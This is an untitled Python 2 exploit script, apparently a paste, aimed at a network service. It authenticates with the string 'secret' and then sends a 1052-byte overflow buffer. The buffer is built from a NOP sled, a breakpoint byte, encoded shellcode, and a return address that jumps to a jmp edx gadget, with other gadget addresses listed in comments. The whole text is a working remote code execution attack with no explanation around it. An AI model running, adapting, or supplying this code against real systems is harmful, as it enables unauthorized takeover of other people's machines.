Untitled

#!/usr/bin/python

import socket, sys

if len(sys.argv) != 3:
	print "supply IP PORT"
	sys.exit(-1)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( (sys.argv[1], int(sys.argv[2])) )

###send
sock.sendall("secret\n\x00")

data = sock.recv(10000)
print data
shellcode =  ""
shellcode += "\xbd\x72\xfd\xa7\x4b\xda\xc5\xd9\x74\x24\xf4\x5f\x2b"
shellcode += "\xc9\xb1\x31\x31\x6f\x13\x83\xc7\x04\x03\x6f\x7d\x1f"
shellcode += "\x52\xb7\x69\x5d\x9d\x48\x69\x02\x17\xad\x58\x02\x43"
shellcode += "\xa5\xca\xb2\x07\xeb\xe6\x39\x45\x18\x7d\x4f\x42\x2f"
shellcode += "\x36\xfa\xb4\x1e\xc7\x57\x84\x01\x4b\xaa\xd9\xe1\x72"
shellcode += "\x65\x2c\xe3\xb3\x98\xdd\xb1\x6c\xd6\x70\x26\x19\xa2"
shellcode += "\x48\xcd\x51\x22\xc9\x32\x21\x45\xf8\xe4\x3a\x1c\xda"
shellcode += "\x07\xef\x14\x53\x10\xec\x11\x2d\xab\xc6\xee\xac\x7d"
shellcode += "\x17\x0e\x02\x40\x98\xfd\x5a\x84\x1e\x1e\x29\xfc\x5d"
shellcode += "\xa3\x2a\x3b\x1c\x7f\xbe\xd8\x86\xf4\x18\x05\x37\xd8"
shellcode += "\xff\xce\x3b\x95\x74\x88\x5f\x28\x58\xa2\x5b\xa1\x5f"
shellcode += "\x65\xea\xf1\x7b\xa1\xb7\xa2\xe2\xf0\x1d\x04\x1a\xe2"
shellcode += "\xfe\xf9\xbe\x68\x12\xed\xb2\x32\x78\xf0\x41\x49\xce"
shellcode += "\xf2\x59\x52\x7e\x9b\x68\xd9\x11\xdc\x74\x08\x56\x12"
shellcode += "\x3f\x11\xfe\xbb\xe6\xc3\x43\xa6\x18\x3e\x87\xdf\x9a"
shellcode += "\xcb\x77\x24\x82\xb9\x72\x60\x04\x51\x0e\xf9\xe1\x55"
shellcode += "\xbd\xfa\x23\x36\x20\x69\xaf\x97\xc7\x09\x4a\xe8"

#buf length to overwrite 1052
size = 1052
bp = '\xcc\x90\x90\x90'
s1 = "\x90" * 500
buf_size = size - len(shellcode) - len(s1) - len(bp) - 4 - 4
buf = "\x90" * buf_size


#0x6fc560fb
#0x6e95762b
#0x6fc8f1cf
ret = "\x2b\x76\x95\x6e" #ret address to jmp edx
#ret = "B" * 4

msg = buf + bp + shellcode + "BBBB" + s1 + ret
sock.sendall(msg)

###recieve
data = sock.recv(10000)
print data